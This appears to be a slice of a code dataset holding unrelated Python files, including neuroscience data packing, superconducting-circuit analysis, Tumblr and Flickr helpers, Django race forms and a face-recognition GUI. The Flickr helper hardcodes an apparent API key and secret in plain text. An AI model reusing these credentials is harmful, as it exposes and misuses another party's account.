n_eye_chan.append(np.nan)\n has_running.append(np.nan)\n assert len(sess_exist)==len(recs),'sess_exist is the wrong length'\n assert len(sess_duration)==len(recs),'sess_duration is the wrong length'\n assert len(n_r_stim)==len(recs),'n_r_stim is the wrong length'\n assert len(n_l_stim)==len(recs),'n_l_stim is the wrong length'\n assert len(has_whisk_cam)==len(recs),'has_whisk_cam is the wrong length'\n assert len(n_whisk_chan)==len(recs),'n_whisk_chan is the wrong length'\n assert len(has_eye_cam)==len(recs),'has_eye_cam is the wrong length'\n assert len(n_eye_chan)==len(recs),'n_eye_chan is the wrong length'\n assert len(has_running)==len(recs),'has_running is the wrong length'\n \n recs['sess_exists'] = sess_exist\n recs['sess_duration'] = sess_duration\n recs['n_r_stim'] = n_r_stim\n recs['n_l_stim'] = n_l_stim\n recs['has_whisk_cam'] = has_whisk_cam\n recs['n_whisk_chan'] = n_whisk_chan\n recs['has_eye_cam'] = has_eye_cam\n recs['n_eye_chan'] = n_eye_chan\n recs['has_running'] = has_running\n \n recs.to_excel(op.join(base_path,'Details_added.xls'))\n \n \n # make qsub file\n make_qsub_file = False\n if make_qsub_file:\n save_path = '/home/bsriram/shutils/'\n make_qsub_for_data_packing(save_path,len(recs))\n \n # run the loading and packing routine\n load_and_pack = False\n if load_and_pack:\n for row in recs.itertuples():\n print('Loading and packing data for {0}'.format(row.folder))\n if row.data_source=='tdt':\n # load and pack the raw data\n from util.tdt_utils import load_data as load_data\n d,ratio,fs,n_chans = load_data(op.join(row.raw_data_path,row.folder))\n if not op.exists(op.join(row.analysis_data_path,row.folder)):\n print('Analysis folder not found. Making it before proceeding')\n os.makedirs(op.join(row.analysis_data_path,row.folder))\n pack(op.join(row.analysis_data_path,row.folder),d,fs,ratio=ratio,n_chans=n_chans)\n \n # load and pack the timestamps\n from util.tdt_utils import pack_timestamps\n pack_timestamps(op.join(row.raw_data_path,row.folder),save_path=op.join(row.analysis_data_path,row.folder))\n \n print('Finished packing data for {0}'.format(row.folder))\n print('')\n \n # pack running details only\n load_and_pack_running = True\n if load_and_pack_running:\n for row in recs.itertuples():\n print('Looking to packing running data for {0}'.format(row.folder))\n if row.sess_exists and row.has_running:\n if row.data_source=='tdt':\n # load and pack the running data\n from util.tdt_utils import load_running_data as load_running_data\n d,exists = load_running_data(op.join(row.raw_data_path,row.folder))\n if exists:\n if not op.exists(op.join(row.analysis_data_path,row.folder)):\n print('Analysis folder not found. Making it before proceeding')\n os.makedirs(op.join(row.analysis_data_path,row.folder))\n pack_running(op.join(row.analysis_data_path,row.folder),d)\n \n print('Finished packing running data for {0}'.format(row.folder))\n print('')\n else:\n print('No running found')\n \n # detect and cluster data\n detect_and_cluster = False\n if detect_and_cluster:\n for row in recs.itertuples():\n print('Detect and cluster data for {0}'.format(row.folder))\n \n # import as needed \n from util.kwik_utils import process as detect_and_cluster\n kwik_path = detect_and_cluster(op.join(row.analysis_data_path,row.folder,),\n prm_loc='/home/bsriram/code/neuralcircuits_analysis/klusta_params/params.prm',\n prb_loc='/home/bsriram/code/neuralcircuits_analysis/probes/NNX_16Ch_Linear_SE.prb',\n delete_working_dirs_on_complete = True)\n print('Finished detection and clustering for {0}'.format(row.folder))\n print('')\n \n # make and save the LFP data\n save_LFP_data = False\n if save_LFP_data:\n from util.lfp_utils import get_and_save_lfp as get_and_save_lfp\n for row in recs.itertuples():\n get_and_save_lfp(row.analysis_data_path,row.folder,save_name='bpLFP_raw.fif',notch_filter=True)\n \n # use events and epoch file\n get_and_save_epochs = False\n if get_and_save_epochs:\n from util.lfp_utils import get_and_save_epoch_response as get_and_save_epoch_response\n for row in recs.itertuples():\n get_and_save_epoch_response(row.analysis_data_path,row.folder,stim='r_stim')\n get_and_save_epoch_response(row.analysis_data_path,row.folder,stim='l_stim')\n get_and_save_epoch_response(row.analysis_data_path,row.folder,stim='none',n_stim=50)\n \n # \n \n print('SUCCESS')","sub_path":"process_recording_files.py","file_name":"process_recording_files.py","file_ext":"py","file_size_in_byte":12371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"464566832","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.signal import find_peaks\n\nfrom _functions import read_wr_data, save_session_data\n\nfrom util import physical_constants, color_dictionary\n\np = physical_constants()\ncolors = color_dictionary()\n\nplt.close('all')\n\n#%%\n\nnum_jjs = 4\n\nif num_jjs == 2: \n dI_de = 1\n I_de_0 = 53\n I_de_f = 80\n\nif num_jjs == 4:\n dI_de = 1\n I_de_0 = 74\n I_de_f = 100\n \nI_de_vec = np.arange(I_de_0,I_de_f+dI_de,dI_de)\nnum_I_de = len(I_de_vec)\n \nPhi_th_vec = np.zeros([len(I_de_vec)])\nL_in = 200e-12\nL_left = 20e-12\nM = np.sqrt(L_in*L_left)\ndirectory_name = 'wrspice_data/{:d}jj/direct_drive__lin_ramp__find_flux_threshold'.format(num_jjs)\nfor ii in range(len(I_de_vec)):\n \n print('ii = {} of {}'.format(ii+1,len(I_de_vec)))\n \n I_de = I_de_vec[ii] \n \n file_name = 'ne_{:d}jj_direct_drive_lin_ramp_alt_ind_Ldrv200pH_Lnr20pH20pH_Ide{:05.2f}uA_taunf50.00ns_dt01.0ps.dat'.format(num_jjs,I_de) \n data_dict = read_wr_data('{}/{}'.format(directory_name,file_name))\n if num_jjs == 2:\n I_nf_str = 'L0#branch'\n I_drive_str = 'L1#branch'\n elif num_jjs == 4:\n I_nf_str = 'L2#branch'\n I_drive_str = 'L3#branch'\n \n time_vec = data_dict['time']\n dt = time_vec[1]-time_vec[0]\n I_nf_vec = data_dict[I_nf_str]\n flux_drive_vec = M*data_dict[I_drive_str]\n\n I_nf_peaks, _ = find_peaks(I_nf_vec, distance = 10e-9/dt, height = 10e-6) # \n Phi_th_vec[ii] = flux_drive_vec[I_nf_peaks[0]]\n # else:\n \n \n # fig = plt.figure() \n # ax = fig.gca()\n # ax.plot(time_vec*1e9,I_nf_vec*1e6, '-', color = colors['blue3'], label = 'I_nf') \n # ax.plot(time_vec[I_nf_peaks]*1e9,I_nf_vec[I_nf_peaks]*1e6, 'x', color = colors['red3'], label = 'I_nf_peaks') \n # ax.set_xlabel(r'Time [ns]')\n # ax.set_ylabel(r'I_nf [uA]')\n # ax.legend() \n # plt.show()\n\nI_drive_th_vec = Phi_th_vec/M\n\nprint('Phi_th_vec = {}'.format(Phi_th_vec))\nprint('I_drive_th_vec = {}'.format(I_drive_th_vec))\n\n#%% plot\nfig = plt.figure()\n# fig.suptitle('Isi vs Isy; tau_si = inf; L_si = {:7.4f} nH'.format(synapse_list[0].integration_loop_total_inductance*1e9)) \nax = fig.gca()\n\nax.plot(I_de_vec,Phi_th_vec/p['Phi0'], '-o', color = colors['blue3'])\nax.set_xlabel(r'$I_{de}$ [$\\mu$A]')\nax.set_ylabel(r'$\\Phi_{th}^{nr}/\\Phi_0$')\n\nplt.show()\n\n#%% save data\nsave_string = 'master_neu_flx_thr_{:1d}jj_Llft20.0_Lrgt20.0_Lnf65.0'.format(num_jjs)\ndata_array = dict()\ndata_array['Phi_th_vec'] = Phi_th_vec\ndata_array['I_de_vec'] = I_de_vec\nprint('\\n\\nsaving session data ...\\n\\n')\n# # save_session_data(data_array,save_string)\nsave_session_data(data_array,save_string+'.soen',False)\n\n#%% calculate I_drive_array for s__neu__2jj__cnst_drv__for_reset.py\n\nI_drive_array = []\ndI_drive = 1\nI_f = I_drive_th_vec[0]*1e6 # p['Phi0']*1e6/(2*M)\nfor ii in range(len(I_drive_th_vec)):\n I_0 = I_drive_th_vec[ii]*1e6\n I_drive_vec = np.append(np.arange(I_0,I_f,dI_drive),I_f)\n I_drive_array.append(I_drive_vec)\n \nsave_string = 'I_drive_array_{:1d}jj_Llft20.0_Lrgt20.0_Lnf65.0'.format(num_jjs)\ndata_array = dict()\ndata_array['I_drive_array'] = I_drive_array\ndata_array['I_de_vec'] = I_de_vec\nprint('\\n\\nsaving session data ...\\n\\n')\n# # save_session_data(data_array,save_string)\nsave_session_data(data_array,save_string+'.soen',False)\n\n#%% because grumpy doesn't run pickle, paste this in s__neu__2jj__cnst_drv__for_reset.py\nfile_string = 'I_drive_array = ['\nfor ii in range(len(I_drive_th_vec)):\n I_drive_vec = I_drive_array[ii]\n file_string += '['\n for jj in range(len(I_drive_vec)):\n file_string += '{:4.2f},'.format(np.round(I_drive_vec[jj],6))\n file_string = file_string[0:-1]+'],'\nfile_string = file_string[0:-1]+']' \n \nprint(file_string)\n\nfile_string = 'I_de_vec = ['\nfor ii in range(len(I_de_vec)):\n file_string += '{:4.2f},'.format(np.round(I_de_vec[ii],6))\nfile_string = file_string[0:-1]+']' \nprint(file_string)\n\n ","sub_path":"neuron/s__neu__direct_drive__lin_ramp__find_flux_threshold.py","file_name":"s__neu__direct_drive__lin_ramp__find_flux_threshold.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"64452093","text":"from logins import tumblr_data\r\nimport pytumblr\r\nimport random\r\n\r\nblog_name = tumblr_data['blog_name']\r\ndefault_tag = tumblr_data['default_tag']\r\nclient = pytumblr.TumblrRestClient(tumblr_data['api_key'])\r\n\r\ndef get_posts(blog_name, type, options):\r\n return client.posts(blog_name, type, **options)\r\n \r\ndef get_total_posts(tag):\r\n posts = get_posts(blog_name, 'photo', { 'tag' : tag })\r\n return posts['response']['total_posts']\r\n\r\ndef get_random_post(tag):\r\n total_posts = get_total_posts(tag)\r\n index = random.randrange(total_posts)\r\n options = { 'tag' : tag, 'offset' : index, 'limit' : 1 }\r\n posts = get_posts(blog_name, 'photo', options)\r\n post = posts['response']['posts'][0]\r\n return post\r\n \r\ndef get_url(tag = default_tag):\r\n post = get_random_post(tag)\r\n return post['short_url']\r\n\r\ndef get_image(tag = default_tag):\r\n post = get_random_post(tag)\r\n photos = []\r\n for photo in post['photos']:\r\n photos.append(photo['original_size']['url'])\r\n return '\\n'.join(photos)\r\n ","sub_path":"tumblr.py","file_name":"tumblr.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"204041648","text":"from sklearn import metrics\nfrom sklearn.metrics import mean_squared_error\nfrom scipy import stats\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns \nimport numpy as np \nimport pickle\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\n\n\ndef concat_tensor(tensor_list, keep_tensor = False):\n \"\"\" converts a list of tensors to a numpy array for stats analysis \"\"\"\n for i, item in enumerate(tensor_list):\n item.to('cpu')\n if i == 0:\n output_tensor = item\n if i > 0:\n output_tensor = torch.cat((output_tensor, item), 0)\n \n if keep_tensor:\n return output_tensor\n else:\n return np.array(output_tensor)\n\ndef regression_eval(predicted, labels, SAVE_PATH):\n \"\"\" \n input: 1D tensor or array of predicted values and labels\n output: saves spearman, MSE, and graph of predicted vs actual \n \"\"\"\n\n predicted = np.array(predicted)\n labels = np.array(labels)\n\n rho, _ = stats.spearmanr(predicted, labels) # spearman\n mse = mean_squared_error(predicted, labels) # MSE\n\n plt.figure()\n plt.title('predicted (y) vs. labels (x)')\n sns.scatterplot(x = labels, y = predicted, s = 2, alpha = 0.2)\n plt.savefig(SAVE_PATH / 'preds_vs_labels.png', dpi = 300)\n\n return round(rho, 2), round(mse, 2)\n\ndef evaluate_esm(data_iterator, model, device, size, mean, mut_mean, SAVE_PATH):\n \"\"\" run data through model and print eval stats \"\"\"\n \n # create a tensor to hold results\n out = np.empty([size])\n labels = np.empty([size])\n\n s = 0 \n \n model.eval()\n model.to(device)\n\n with torch.no_grad(): # evaluate validation loss here \n for i, (inp, l) in enumerate(data_iterator):\n \n inp = inp.to(device)\n\n if mean or mut_mean: \n o = model(inp).squeeze().cpu()\n else:\n m = (inp[:, :, 0] != 0).long().to(device)\n o = model(inp, m).squeeze().cpu() # Forward prop without storing gradients\n\n b = inp.shape[0] \n out[s: s + b:] = o\n labels[s: s + b:] = l\n\n s += b\n\n if mean:\n SAVE_PATH = SAVE_PATH / 'mean'\n if mut_mean:\n SAVE_PATH = SAVE_PATH / 'mut_mean'\n \n SAVE_PATH.mkdir(parents=True, exist_ok=True) # make directory if it doesn't exist already\n with open(SAVE_PATH / 'preds_labels_raw.pickle', 'wb') as f:\n pickle.dump((out, labels), f)\n \n rho, mse = regression_eval(predicted=out, labels=labels, SAVE_PATH=SAVE_PATH)\n\n return rho, mse\n","sub_path":"baselines/evals.py","file_name":"evals.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"29002469","text":"# -*- coding: latin-1 -*-\nimport sqlite3\nimport datetime\nimport time\nimport scipy\n\ndef cria_tabela():\n\tcreateDB = sqlite3.connect('forno_data.db')\n\tqueryCurs = createDB.cursor()\n\tqueryCurs.execute('''CREATE TABLE IF NOT EXISTS dados_forno\n\t(id INTEGER PRIMARY KEY,t_abs TIMESTAMP DEFAULT (DATETIME('now')),t_0 REAL,s1 REAL, s2 REAL, s3 REAL, s4 REAL, s5 REAL, s6 REAL,experimento TEXT)''')\n\tcreateDB.commit()\n\ndef adiciona_dado(t_0,s1,s2,s3,s4,s5,s6,experimento=None):\n\tcreateDB = sqlite3.connect('forno_data.db')\n\tqueryCurs = createDB.cursor()\n\tt_abs = datetime.datetime.now()\n\tif experimento:\t\t# Caso o experimento tenha nome, sava o nome do experimento\n\t\tqueryCurs.execute('''INSERT INTO dados_forno (t_abs,t_0,s1,s2,s3,s4,s5,s6,experimento)\n\t\t\t\t\t\tVALUES(?,?,?,?,?,?,?,?,?)''',(t_abs,t_0,s1,s2,s3,s4,s5,s6,experimento))\n\telse:\n\t\tqueryCurs.execute('''INSERT INTO dados_forno (t_abs,t_0,s1,s2,s3,s4,s5,s6)\n\t\t\t\t\t\tVALUES(?,?,?,?,?,?,?,?)''',(t_abs,t_0,s1,s2,s3,s4,s5,s6))\t\t\n\tcreateDB.commit()\n\ndef deleta_tabeta():\n\tcreateDB = sqlite3.connect('forno_data.db')\n\tqueryCurs = createDB.cursor()\n\tqueryCurs.execute(\"DELETE FROM dados_forno WHERE id > -1\")\n\tcreateDB.commit()\n\ndef retorna_dados(delta_t,experimento=None,Ti=None,Tf=None):\n\tcreateDB = sqlite3.connect('forno_data.db')\n\tqueryCurs = createDB.cursor()\n\tif experimento:\n\t\tqueryCurs.execute(\"SELECT * FROM dados_forno WHERE experimento = ?\",(experimento,))\n\telse:\n\t\tif Ti == None and Tf == None:\n\t\t\ttempo_inicial = datetime.datetime.now() - datetime.timedelta(minutes=delta_t)\n\t\t\tqueryCurs.execute(\"SELECT * FROM dados_forno WHERE t_abs > ?\",(tempo_inicial,))\n\t\telse:\n\t\t\tqueryCurs.execute(\"SELECT * FROM dados_forno WHERE t_abs > ? AND t_abs < ?\",(Ti,Tf))\n\tcreateDB.commit()\n\treturn scipy.array(queryCurs.fetchall())\t\n","sub_path":"Controle/interfacegrafica/sensor_db.py","file_name":"sensor_db.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"221969969","text":"import json \nfrom devices import log\n\n\nclass Config():\n\n def __init__(self):\n with open('./config.json', 'r') as file:\n self._config_dict = json.load(file)\n\n def get_output_path(self):\n try:\n return self._config_dict['output_path']\n except KeyError as ex:\n log.log_msg_with_error(\"couldn't load output path\", ex)\n \n def get_debug(self):\n try:\n return self._config_dict['debug']\n except KeyError as ex:\n log.log_msg_with_error(\"couldn't load debug\", ex)\n \n def get_image_show_time_in_s(self):\n try:\n return self._config_dict['image_show_time_in_s']\n except KeyError as ex:\n log.log_msg_with_error(\"couldn't load image_show_time_in_s\", ex)\n\n def get_serial_port(self):\n try:\n return self._config_dict['serial_port']\n except KeyError as ex:\n log.log_msg_with_error(\"couldn't load serial_port\", ex)\n","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"2097317","text":"\r\n# execfile(PATH_SAVE_VAR+\"lawn-garden/workspace.py\");\r\n\r\nfrom datetime import datetime, date, time, timedelta\r\n\r\n#set workspace variables\r\nworkspace = 'lawn-garden'; \r\ndate_from = datetime(2011,1,1);\r\ndate_to = None; #datetime(2011,6,25);\r\n\r\nfrom collections import defaultdict;\r\nws_options=defaultdict(str);\r\nws_options['category']='Lawn & Garden';\r\nws_options['include_verb']=False;\r\nws_options['show_debug']=True;\r\nws_options['taxonomy']=[('Plants', 'Plants'), ('Tools', 'Tools'), ('Drug', 'Drug'), ('Company', 'Company'), \r\n\t('Date', 'Date'), ('Event', 'Event'), ('Location', 'Location Name'), ];\r\nif not ws_options['mapclass']: ws_options['mapclass']={ws_options['taxonomy'][0][0]:ws_options['taxonomy'][0][0], \r\n\t\t\t\t\t\t\t\t\t\t\t\t\tws_options['taxonomy'][1][0]:ws_options['taxonomy'][1][0],\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tws_options['taxonomy'][2][0]:ws_options['taxonomy'][2][0]};\r\nPATH_VAR_WORKSPACE=\"lawn-garden/\";\r\nPATH_DATA_SUBDIR=\"lawn-garden/\";\r\n\r\n#set list of files\r\nimport os;\r\nallfiles=os.listdir(PATH_DATA_COLLECTION+PATH_DATA_SUBDIR);\r\nimport re;\r\nblog_files=[\r\n\t('z.about.com.txt', 'Z.about.com'),\r\n\t('lawncare.0.tqn.com.txt', 'lawncare.0.tqn.COM'),\r\n\t('treesandshrubs.0.tqn.com.txt', 'treesandshrubs.0.tqn.COM'),\r\n\t('herbgardens.0.tqn.com.txt', 'herbgardens.0.tqn.COM'),\r\n\t('flowers.0.tqn.com.txt', 'flowers.0.tqn.COM'),\r\n\t('houseplants.0.tqn.com.txt', 'houseplants.0.tqn.COM'),\r\n\t('organicgardening.0.tqn.com.txt', 'organicgardening.0.tqn.COM'),\r\n\t('gardening.0.tqn.com.txt', 'gardening.0.tqn.COM'),\r\n\t('landscaping.0.tqn.com.txt', 'landscaping.0.tqn.COM'),\r\n\t('smallfarm.0.tqn.com.txt', 'smallfarm.0.tqn.COM'),\r\n\t('garden.lovetoknow.com.txt', 'garden.lovetoknow.COM'),\r\n\t('fencespecialists.com.txt', 'fencespecialists.COM'),\r\n\t('blog.midatlanticdeckandfence.com.txt', 'blog.midatlanticdeckandfence.COM'),\r\n\t('ehow.com.txt', 'ehow.COM'),\r\n\t#('feeds.nytimes.com.txt', 'feeds.nytimes.COM'),\r\n\t('feeds.washingtonpost.com.txt', 'feeds.washingtonpost.COM'),\r\n\t('feeds.feedburner.com.txt', 'feeds.feedburner.COM'),\r\n\t('baltimoresun.com.txt', 'baltimoresun.COM'),\r\n\t('goarticles.com.txt', 'goarticles.COM'),\r\n\t#('simplefeed.consumerreports.org.txt', 'simplefeed.consumerreports.ORG'),\r\n];\r\n\r\nblog_query=None;\r\n\r\n","sub_path":"python-saved-var/lawn-garden/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588175171","text":"from typing import Tuple\r\n\r\nimport math\r\nimport pygame\r\nfrom constants import *\r\n\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n \"\"\"\r\n The bullet class.\r\n \"\"\"\r\n\r\n def __init__(self, x: int, y: int, color: Tuple[int, int, int], direction, screen_rect: pygame.Rect):\r\n super().__init__()\r\n self.image = pygame.Surface((BULLET_WIDTH, BULLET_HEIGHT)).convert()\r\n self.image.fill(color)\r\n self.rect = self.image.get_rect()\r\n self.rect.x = x\r\n self.rect.y = y\r\n\r\n self.direction = direction\r\n self.vel_x = math.sin(self.direction/180 * math.pi) * BULLET_VEL\r\n self.vel_y = math.cos(self.direction/180 * math.pi) * BULLET_VEL\r\n self.screen_rect = screen_rect\r\n\r\n def update(self):\r\n self.rect.x += self.vel_x\r\n self.rect.y += self.vel_y\r\n\r\n # Kill if it goes off screen\r\n if not self.screen_rect.colliderect(self.rect):\r\n self.kill()\r\n","sub_path":"lihan_code/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"304013176","text":"def search(low, high):\n\tcurrent_guess = low + (high-low)//2\n\t\n\tinvalid_response = True\n\twhile (invalid_response):\n\t\tresponse = input(\"Is your number \" + str(current_guess)+ \":\")\n\t\tif response == 'y':\n\t\t\tprint(\"Great! I knew I could do it\")\n\t\t\treturn\n\t\telif response == 'n':\n\t\t\tinvalid_response = False\n\t\telse:\n\t\t\tprint(\"I couldn't understand that\")\n\t\t\n\t\n\tinvalid_response = True\n\twhile (invalid_response):\n\t\tresponse = input(\"Is it less than \" + str(current_guess) + \"(yes/no):\")\n\t\tif response == 'yes':\n\t\t\tprint(\"Hmm...\")\n\t\t\tsearch(low, current_guess-1)\n\t\t\tinvalid_response = False\n\t\telif response == 'no':\n\t\t\tprint(\"Hmm...\")\n\t\t\tsearch(current_guess+1,high)\n\t\t\tinvalid_response = False\n\t\telse:\n\t\t\tprint(\"I couldn't understand that\")\n\nprint(\"I can guess your number in 10 or less moves!\")\nprint(\"In your head, pick a number between 0 and 1000, and I'll try to guess it.\")\nprint(\"Ready?\")\nsearch(0,1000)","sub_path":"3_Functions/binarysearch.py","file_name":"binarysearch.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"587142308","text":"import flickrapi\nimport os\nimport sys\nimport random\napi_key = \"f65ecb65aba7cfc667b32b464af5e4b2\"\nsecret=\"caf4d6568c0d7e4b\"\nurl_template = 'http://farm%(farm_id)s.staticflickr.com/%(server_id)s/%(photo_id)s_%(secret)s.jpg'\n\ndef url_for_photo(p):\n return url_template % {\n 'server_id': p.get('server'),\n 'farm_id': p.get('farm'),\n 'photo_id': p.get('id'),\n 'secret': p.get('secret'),\n }\n \ndef get_random_img(word):\n flickr = flickrapi.FlickrAPI(api_key, secret)\n return url_for_photo(random.choice(flickr.photos_search(tags=word, per_page=20)[0]))\n","sub_path":"AlexBot/flickr.py","file_name":"flickr.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"548407489","text":"from django import forms\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.bootstrap import AppendedText, PrependedText\nfrom crispy_forms.layout import Layout, Div, Submit\nimport time\n\nfrom .models import Runner, Race\n\nclass NewRaceForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(NewRaceForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper(self)\n self.helper.form_method = 'POST'\n self.helper.form_action = 'submit_survey'\n self.helper.add_input(Submit('submit', 'Add Race', css_class=\"btn-primary pull-right\"))\n self.helper.layout = Layout(\n Div(\n Div('nombre', css_class='col-xs-6'),\n Div(AppendedText('distancia', 'Km'), css_class='col-xs-3')),\n Div( \n Div('dia', css_class='col-xs-3'))\n )\n class Meta:\n model = Race\n fields = ['nombre', 'distancia', 'dia']\n widgets = {\n 'dia':forms.DateInput(format=('%Y-%m-%d'), attrs={\n 'type': 'date',\n 'data-date-format': 'yyyy-mm-dd',\n 'class': 'datepicker'} \n ),}\n\nclass AddRunnerForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(AddRunnerForm, self).__init__(*args, **kwargs)\n self.fields['race'].queryset = Race.objects.exclude(status=\"finished\")\n self.helper = FormHelper(self)\n self.helper.form_method = 'POST'\n self.helper.add_input(Submit('submit', 'Add Runner', css_class=\"btn-primary pull-right\"))\n self.helper.layout = Layout(\n Div(\n Div('race', css_class='col-xs-12'), css_class='row'\n ),\n Div(\n Div('numero', css_class='col-xs-6'), css_class='row'\n ),\n Div(\n Div('nombre', 'edad', 'localidad', css_class='col-xs-6'),\n Div('apellido', 'sexo', 'dni', css_class='col-xs-6'),css_class='row'\n )\n )\n\n class Meta:\n model = Runner\n fields = ['race', 'numero', 'apellido', 'nombre', 'sexo', 'edad', 'dni', 'localidad']\n\n def clean(self):\n cleaned_data = super(AddRunnerForm, self).clean()\n CATEGORIAS = Runner.CATEGORIAS\n edad = self.cleaned_data.get('edad')\n if edad:\n for i in CATEGORIAS:\n if i[0] <= edad and edad <= i[1]:\n categoria = str(i[0])+\"-\"+str(i[1])\n break\n self.instance.categoria = categoria\n\n # email_base, provider = email.split('@')\n # if not provider == 'gmail.com':\n # raise forms.ValidationError('Por favor ingrese un email de gmail')\n # return email \n\nimport django_filters as df\n#FILTER_GENDER_CHOICES = list(Runner.CATEGORIAS)\n#FILTER_GENDER_CHOICES.insert(0, ('','---------') )\n\nclass RunnerFilter(df.FilterSet):\n #categoria = df.ChoiceFilter(choices= FILTER_GENDER_CHOICES )\n class Meta:\n model = Runner\n fields = {'sexo': ['exact'],\n 'categoria': ['exact'],\n }\n\n def __init__(self, *args, **kwargs):\n super(RunnerFilter, self).__init__(*args, **kwargs)\n for name, field in self.filters.iteritems():\n if isinstance(field, df.ChoiceFilter):\n field.extra['choices'] = tuple([(\"\", \"-\"), ] + list(field.extra['choices']))\n for field in self.form.fields.values():\n field.help_text = None\n helper = FormHelper()\n helper.form_method = 'GET'\n helper.add_input(Submit('submit', 'Filtrar', css_class=\"btn-default\"))\n helper.template_pack = 'bootstrap3'\n helper.layout = Layout(\n Div(\n Div('categoria', css_class='col-xs-2'),\n Div('sexo', css_class='col-xs-2'), css_class=\"filter-form\"\n ))\n self.form.helper = helper\n","sub_path":"RaceManager/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"38446492","text":"# encoding: utf-8\nfrom tkinter import *\n\nimport os\nimport captura\nimport treinamento\nimport reconhecedor_lbph\nimport reconhecedor_eigenfaces\nimport reconhecedor_fisherfaces\nimport popup\n\nclass Application:\n def __init__(self, master=None):\n\n # DEFINDO A TELA\n frm_width = root.winfo_rootx() - root.winfo_x()\n win_width = 500 + 2 * frm_width\n win_height = 380 + frm_width\n x = root.winfo_screenwidth() // 2 - win_width // 2\n y = root.winfo_screenheight() // 2 - win_height // 2\n root.geometry('500x380+{}+{}'.format(x, y))\n root.title(\"APS - Sistema de Reconhecimento Facial\")\n root['bg'] = '#353b48'\n\n self.fontePadrao = (\"Arial\", \"10\")\n\n self.primeiroContainer = Frame(master)\n self.primeiroContainer[\"padx\"] = 80\n self.primeiroContainer[\"pady\"] = 10\n self.primeiroContainer[\"bg\"] = '#353b48'\n self.primeiroContainer.pack()\n\n self.segundoContainer = Frame(master)\n self.segundoContainer[\"padx\"] = 80\n self.segundoContainer[\"bg\"] = '#353b48'\n self.segundoContainer.pack()\n\n self.segundoContainerId = Frame(master)\n self.segundoContainerId[\"padx\"] = 80\n self.segundoContainerId[\"pady\"] = 10\n self.segundoContainerId[\"bg\"] = '#353b48'\n self.segundoContainerId.pack()\n\n self.terceiroContainer = Frame(master)\n self.segundoContainer[\"padx\"] = 80\n self.terceiroContainer[\"pady\"] = 15\n self.terceiroContainer[\"bg\"] = '#353b48'\n self.terceiroContainer.pack()\n\n self.quartoContainer = Frame(master)\n self.quartoContainer[\"padx\"] = 80\n self.quartoContainer[\"pady\"] = 15\n self.quartoContainer[\"bg\"] = '#353b48'\n self.quartoContainer.pack()\n\n self.quintoContainer = Frame(master)\n self.quintoContainer[\"padx\"] = 120\n self.quintoContainer[\"bg\"] = '#353b48'\n self.quintoContainer.pack()\n\n self.sextoContainer = Frame(master)\n self.sextoContainer[\"pady\"] = 10\n self.sextoContainer[\"bg\"] = '#353b48'\n self.sextoContainer.pack()\n\n # PRIMEIRO CONTAINER\n self.titulo = Label(self.primeiroContainer, text=\"APS - Sistema de Reconhecimento Facial\")\n self.titulo[\"font\"] = (\"Arial\", \"12\", \"bold\")\n self.titulo[\"bg\"] = '#353b48'\n self.titulo[\"fg\"] = '#f5f6fa'\n self.titulo.pack()\n\n # SEGUNDO CONTAINER\n # Solicitando Nome do Usuario\n self.aprendendo = Label(self.segundoContainer, text=\"Aprendizado Supervisionado - IA\")\n self.aprendendo[\"font\"] = (\"Arial\", \"10\", \"italic\")\n self.aprendendo[\"bg\"] = '#353b48'\n self.aprendendo[\"fg\"] = '#f5f6fa'\n self.aprendendo.pack()\n\n self.nomeLabel = Label(self.segundoContainer, text=\"Nome\", font=self.fontePadrao)\n self.nomeLabel[\"bg\"] = '#353b48'\n self.nomeLabel[\"fg\"] = '#f5f6fa'\n self.nomeLabel.pack(side=LEFT)\n\n self.nome = Entry(self.segundoContainer)\n self.nome[\"width\"] = 30\n self.nome[\"font\"] = self.fontePadrao\n self.nome.pack(side=LEFT)\n\n self.idLabel = Label(self.segundoContainerId, text=\"ID \", font=self.fontePadrao)\n self.idLabel[\"bg\"] = '#353b48'\n self.idLabel[\"fg\"] = '#f5f6fa'\n self.idLabel.pack(side=LEFT)\n\n self.id = Entry(self.segundoContainerId)\n self.id[\"width\"] = 30\n self.id[\"font\"] = self.fontePadrao\n self.id.pack(side=LEFT)\n\n # TERCEIRO CONTAINER\n # Botão de Abrir o Capturador de Fotos\n self.capturarImagem = Button(self.terceiroContainer)\n self.capturarImagem[\"text\"] = \"Capturar Imagens\"\n self.capturarImagem[\"font\"] = (\"Calibri\", \"8\")\n self.capturarImagem[\"width\"] = 23\n 